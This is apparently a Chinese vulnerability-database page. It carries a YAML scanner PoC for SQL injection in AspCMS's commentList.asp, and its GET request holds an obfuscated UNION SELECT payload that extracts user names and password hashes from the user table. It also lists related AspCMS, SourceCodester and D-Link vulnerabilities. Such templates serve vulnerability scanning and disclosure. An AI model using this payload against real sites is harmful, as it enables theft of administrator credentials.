aspcms-commentlist-sql-injection: AspCMS commentList.asp SQL注入漏洞

漏洞描述

PoC代码[已公开]

id: aspcms-commentlist-sql-injection

info:
  name: AspCMS commentList.asp SQL注入漏洞
  author: daffainfo
  severity: high
  verified: false
  description: AspCMS commentList.asp 存在SQL注入漏洞，攻击者通过漏洞可以获取管理员md5的密码 app="ASPCMS"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/AspCMS%20commentList.asp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md

rules:
  r0:
    request:
      method: GET
      path: /plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user
    expression: response.status == 200 && response.body.bcontains(b'<div class=line1>') && response.body.bcontains(b'<div class=line2>')
expression: r0()

相关漏洞推荐

• aspcms-backend-leak: ASPCMS Backend Leak POC

  2025-09-01 | ASPCMS
  app="ASPCMS"

• ASPCMS AspCms_SiteSetting.asp 漏洞探测 2 无POC

  2024-07-18 | AspCMS
  该告警表明检测到针对ASPCMS的攻击尝试流量。ASPCMS中存在任意文件写入漏洞，攻击者通常通过探测行为来决定是否实施进一步的攻击。

• ASPCMS AspCms_SiteSetting.asp 漏洞探测 1 无POC

  2024-07-18 | AspCMS
  该告警表明检测到针对ASPCMS的攻击尝试流量。ASPCMS中存在任意文件写入漏洞，攻击者通常通过探测行为来决定是否实施进一步的攻击。

• SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

  2025-09-22 00:22:31 | SourceCodester Pet Grooming Management Software
  SourceCodester Pet Grooming Management Software是SourceCodester开源的一个宠物美容管理系统。 SourceCodester Pet Groo...

• D-Link DIR-645 命令注入漏洞 无POC

  2025-09-22 00:22:31 | D-Link DIR-645
  D-Link DIR-645是中国友讯（D-Link）公司的一款无线路由器。 D-Link DIR-645 105B01版本存在命令注入漏洞，该漏洞源于对文件/soap.cgi中参数service的错...